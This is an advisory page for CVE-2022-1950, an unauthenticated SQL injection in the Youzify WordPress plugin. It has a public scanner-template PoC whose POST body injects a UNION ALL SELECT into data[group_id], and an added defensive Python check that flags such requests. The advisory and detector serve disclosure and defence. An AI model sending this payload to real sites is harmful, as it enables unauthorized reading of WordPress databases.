CVE-2022-1950: WordPress Youzify SQL injection

Date: 2025-09-01 | Affected software: Unknown | PoC: Public

Vulnerability description

The Youzify WordPress plugin before 1.2.0 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection.

PoC code [public]

id: CVE-2022-1950

info:
  name: Wordpress Youzify sql injection
  author: xpoc,小z
  severity: critical
  verified: true
  description: |-
    The Youzify WordPress plugin before 1.2.0 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection
  reference:
    - https://wpscan.com/vulnerability/4352283f-dd43-4827-b417-0c55d0f4637d
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1950
  tags: wordpress,cve2022,cve,sqli
  created: 2023/06/23

set:
  rInt0: string(randomInt(4000, 70000))
rules:
  r1:
    request:
      method: POST
      path: /wp-admin/admin-ajax.php
      body: action=youzify_media_pagination&data[type]=photos&page=1&data[group_id]=1 UNION ALL SELECT (SELECT md5({{rInt0}}) from wp_users),2,3,4-- -
    expression: response.body.bcontains(bytes(substr(md5(rInt0), 2, 28)))
expression: r1()
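
For defenders, a request-inspection check for the AJAX call the template above sends; this is an added example, not part of the original entry or of the plugin. The action and field names come from the PoC body; treating `page` and `data[group_id]` as integer-only fields is an assumption, and the sample bodies are constructed.

```python
from urllib.parse import parse_qs

# Action and field names are taken from the PoC template on this page.
ACTION = "youzify_media_pagination"
# Assumption: both fields should only ever carry plain integers.
NUMERIC_FIELDS = ("page", "data[group_id]")

# Constructed sample POST bodies for /wp-admin/admin-ajax.php.
SAMPLE_BODIES = [
    "action=youzify_media_pagination&data[type]=photos&page=1&data[group_id]=1",
    "action=youzify_media_pagination&data[type]=photos&page=1"
    "&data[group_id]=1 UNION ALL SELECT 1,2,3,4-- -",
    "action=youzify_media_pagination&page=2&data%5Bgroup_id%5D=7%20OR%201",
    "action=heartbeat&data[group_id]=abc",  # other action: out of scope
]


def inspect_body(body: str) -> list[str]:
    """Return the reasons a form-encoded POST body should raise an alert.

    An empty list means the body targets another AJAX action, or every
    field expected to be numeric holds a single ASCII integer.
    """
    fields = parse_qs(body, keep_blank_values=True)
    if ACTION not in fields.get("action", []):
        return []
    reasons = []
    for name in NUMERIC_FIELDS:
        values = fields.get(name, [])
        if len(values) > 1:
            reasons.append(f"{name}: repeated parameter")
        for value in values:
            # str.isdigit() also accepts non-ASCII digits, so require ASCII.
            if not (value.isascii() and value.isdigit()):
                reasons.append(f"{name}: non-integer value {value!r}")
    return reasons


def triage(bodies):
    """Return (body, reasons) pairs for every body that should be flagged."""
    return [(b, r) for b in bodies if (r := inspect_body(b))]


if __name__ == "__main__":
    for body, reasons in triage(SAMPLE_BODIES):
        print(reasons, "<-", body)
```

A check like this only covers the request shape shown in the template; the description places the flaw in versions before 1.2.0, so the plugin version is what to verify on each site.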